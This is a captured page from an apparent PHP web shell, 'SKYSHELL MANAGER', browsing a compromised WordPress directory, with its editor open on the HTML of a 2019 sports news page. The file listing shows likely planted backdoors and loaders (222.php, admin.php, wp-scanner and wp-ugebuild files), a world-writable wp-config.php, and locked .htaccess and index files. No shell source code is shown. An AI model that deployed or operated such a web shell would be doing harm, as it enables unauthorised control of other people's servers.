📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: sports.php
<!DOCTYPE html> <html> <head> <link rel="icon" href="images/news.png"/> <title>News Todaypost - Sports</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="css/animate.css"> <link rel="stylesheet" type="text/css" href="css/slick.css"> <link rel="stylesheet" type="text/css" href="css/theme.css"> <link rel="stylesheet" type="text/css" href="css/style.css"> <!--[if lt IE 9]> <script src="assets/js/html5shiv.min.js"></script> <script src="assets/js/respond.min.js"></script> <![endif]--> </head> <body> <!--<div id="preloader"> <div id="status"> </div> </div>--> <a class="scrollToTop" href="#"><i class="fa fa-angle-up"></i></a> <div class="container"> <header id="header"> <div class="row"> <div class="col-lg-12 col-md-12" style="width:100%;height:155px;"> <div class="header_top"> <div class="header_top_right"> <!--<form action="#" class="search_form"> <input type="text" placeholder="Text to Search"> <input type="submit" value=""> </form>--> <h4>+318-861-2712</h4> </div> </div> <div class="header_bottom"> <div class="header_bottom_left"><a class="logo" href="index.php"><img src="images/news.png" title="" alt=""/></a></div> <div class="header_bottom_right"><a><img src="images/flag.png" alt=""></a></div> </div> </div> </div> </header> <div id="navarea"> <nav class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav navbar-nav custom_nav"> <li><a href="index.php">Home</a></li> <li><a href="news.php">News</a></li> <li><a href="world.php">World</a></li> <li><a href="techandmedia.php">Tech and Media</a></li> <li class="active"><a href="sports.php">Sports</a></li> <li><a href="politics.php">Politics</a></li> <li><a href="contact-us.php">Contact</a></li> <li><a href="subscribe.php">Subscribe us</a></li> </ul> </div> </div> </nav> </div> <section id="mainContent"> <div class="content_bottom"> <div class="col-lg-8 col-md-8"> <div class="content_bottom_left"> <div class="single_page_area"> <ol class="breadcrumb"> <li><a href="index.php">Home</a></li> <li><a href="sports.php">Sports</a></li> <!-- <li class="active">NBA</li>--> </ol> <h2 class="post_titile">Rockets extend streak over Warriors while LeBron James questions Lakers </h2> <div class="single_page_content"> <div class="post_commentbox"> </div> <img class="img-center" src="images/lakers.jpg" alt=""> <ol style="margin:20px;line-height:25px;font-weight:bold;" id="rocket"> <li>Houston beat Golden State for third time in row, without Harden</li> <li>LA Lakers out of playoff places in Western Conference</li> </ol> <p>Eric Gordon scored 25 points with four three-pointers, Chris Paul converted two free throws with 68 seconds left on the way to 23, and the Houston Rockets outplayed the Golden State Warriors without the league’s scoring leader James Harden for a 118-112 victory on Saturday night.</p> <p>The result means the Rockets have now won all three games against the NBA champions this season. The teams met in the Western Conference last season, where the Warriors won in seven games. “You can come in here and win on a Monday night in February or a Tuesday night in November or December,” Paul, who had 17 assists on the night, said. “But in the playoffs is when you have to beat a team four out of seven times. It’s great tonight that we won this but in two days y’all will forget this. We all will.”</p> <p>Early in the fourth, Golden State’s Draymond Green exited the game with a sprained left ankle after grabbing at his foot in clear pain from stepping on teammate DeMarcus Cousins’ foot. Harden was missing due to flu-like symptoms and a neck strain.</p> <p>Elsewhere, Jrue Holiday hit five three-pointers and scored 27 points while Anthony Davis watched from the bench, and New Orleans beat Los Angeles.</p> <p>Former Laker Julius Randle had 24 points for the Pelicans, who looked in sync and motivated as they slowed LeBron James and the Lakers’ push to qualify for the playoffs. James had 27 points and 12 assists, and Brandon Ingram scored 29 points for Los Angeles.</p> <p>After the game, James appeared to question whether his new teammates had the experience to handle a playoff run. “How many know what’s at stake if you’ve never been there?” James said. “I’m playing devil’s advocate, you know? It’s kind of a fine line when you talk about that, because when you’ve never been there or know what it takes to actually shoot for something like that, sometimes you’re afraid to get uncomfortable.</p> <p>Meanwhile, the Philadelphia 76ers struggled in their second game without All-Star center Joel Embiid, who is expected to miss at least a week with a sore left knee. Ben Simmons had 29 points and 10 assists and Tobias Harris scored 20 as the Sixers lost 130-115 to the Portland Trail Blazers. Without Embiid, the Sixers couldn’t keep up in a matchup between the fourth-place teams in each conference. The Blazers have won three in a row, including a 22-point victory over Golden State before the All-Star break. Philadelphia are 4-4 this month.</p> </div> </div> </div> </div> <div class="col-lg-4 col-md-4"> <div class="content_bottom_right"> <div class="single_bottom_rightbar"> <h2>Recent Post</h2> <ul class="small_catg popular_catg wow fadeInDown"> <li> <div class="media wow fadeInDown"> <a href="sports.php" class="media-left"><img alt="" src="images/lakers.jpg"> </a> <div class="media-body"> <h4 class="media-heading"><a href="sports.php">Rockets extend streak over Warriors while LeBron James questions Lakers </a></h4> <p>Eric Gordon scored 25 points with four three-pointers, Chris Paul converted two free throws with 68 seconds left on the way to 23, and the Houston Rockets outplayed the Golden State Warriors without the league’s scoring leader James Harden for a 118-112 victory on Saturday night. </p> </div> </div> </li> <li> <div class="media wow fadeInDown"> <a href="leicester.php" class="media-left"><img alt="" src="images/leister.webp"> </a> <div class="media-body"> <h4 class="media-heading"><a href="leicester.php">Leicester set to make quick move for Brendan Rodgers as new manager </a></h4> <p>Leicester City are stepping up attempts to hire Brendan Rodgers as their new manager immediately, with the club believing there is now the prospect of him being coaxed from Celtic before the end of the season.</p> </div> </div> </li> <li> <div class="media wow fadeInDown"> <a href="car-race.php" class="media-left"><img alt="" src="images/car-race.jpeg"> </a> <div class="media-body"> <h4 class="media-heading"><a href="car-race.php">Kevin Magnussen: Feel easier to follow new 2019 F1 cars </a></h4> <p>MONTMELO, Spain -- After his first chance to properly follow a rival on track in testing, Haas' Kevin Magnussen said the early signs are that the changes made to Formula One cars in 2019 will improve racing. </p> </div> </div> </li> </ul> </div> <div class="single_bottom_rightbar"> <ul role="tablist" class="nav nav-tabs custom-tabs"> <li class="active" role="presentation"><a data-toggle="tab" role="tab" aria-controls="home" href="#mostPopular">Most Popular</a></li> <!-- <li role="presentation"><a data-toggle="tab" role="tab" aria-controls="messages" href="#recentComent">Recent Comment</a></li>--> </ul> <div class="tab-content"> <div id="mostPopular" class="tab-pane fade in active" role="tabpanel"> <ul class="small_catg popular_catg wow fadeInDown"> <li> <div class="media wow fadeInDown"> <a class="media-left" href="cricket.php"><img src="images/india.jpg" alt=""></a> <div class="media-body"> <h4 class="media-heading"><a href="cricket.php">Cricket World Cup: ICC expects India vs Pakistan to go ahead</a></h4> <p>The International Cricket Council believes the World Cup match between India and Pakistan will go ahead. The group stage highlight on 16 June is in doubt amid tensions over last week’s suicide bomber attack in Kashmir.</p> </div> </div> </li> <li> <div class="media wow fadeInDown"> <a class="media-left" href="women.php"><img src="images/women.jpg" alt=""></a> <div class="media-body"> <h4 class="media-heading"><a href="women.php">Can women make a living out of football?</a></h4> <p> Female footballers have been fighting against discrimination and inequality for over 100 years. Is this fight over, are they now recognized as professional players and can they make a living out of football?According to the 2017 FIFPro Global Employment Report.</p> </div> </div> </li> </ul> </div> </div> </div> </div> </div> </section> </div> <footer id="footer"> <div class="footer_top"> <div class="container"> <div class="row"> <div class="col-lg-4 col-md-4 col-sm-4"> <div class="single_footer_top wow fadeInDown"> <h2>Quick Links</h2> <ul class="labels_nav"> <li><a href="news.php">News</a></li><br> <li><a href="world.php">World</a></li><br> <li><a href="techandmedia.php">Tech and Media</a></li><br> <li><a href="sports.php">Sports</a></li><br> <li><a href="politics.php">Politics</a></li> </ul> </div> </div> <div class="col-lg-4 col-md-4 col-sm-4"> <div class="single_footer_top wow fadeInLeft"> <h2>Useful Links</h2> <ul class="flicker_nav"> <li><a href="privacy-policy.php" title="" alt="">Privacy Policy</a></li> <li><a href="termsandconditions.php" title="" alt="">Terms and conditions</a></li> <li><a href="subscribe.php" title="" alt="">Subscribe</a></li> <li><a href="unsubscribe.php" title="" alt="">Unsubscribe</a></li> </ul> </div> </div> <div class="col-lg-4 col-md-4 col-sm-4"> <div class="single_footer_top wow fadeInRight"> <h2>Contact Us</h2> <p>2490 Cruse Rd NW,<br> Lawrenceville,<br> GA 30044, USA, </p> </div> </div> </div> </div> </div> <div class="footer_bottom"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12"> <div class="center"> <p>Copyright © 2019 <a href="http://newstodaypost.com/index.php">News Todaypost</a></p> </div> </div> <!--<div class="col-lg-6 col-md-6 col-sm-6 col-xs-12"> <div class="footer_bottom_right"> <p>Developed By <a href="http://www.webberax.com">Webberax</a></p> </div> </div>--> </div> </div> </div> </footer> <script src="js/jquery.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/wow.min.js"></script> <script src="js/slick.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save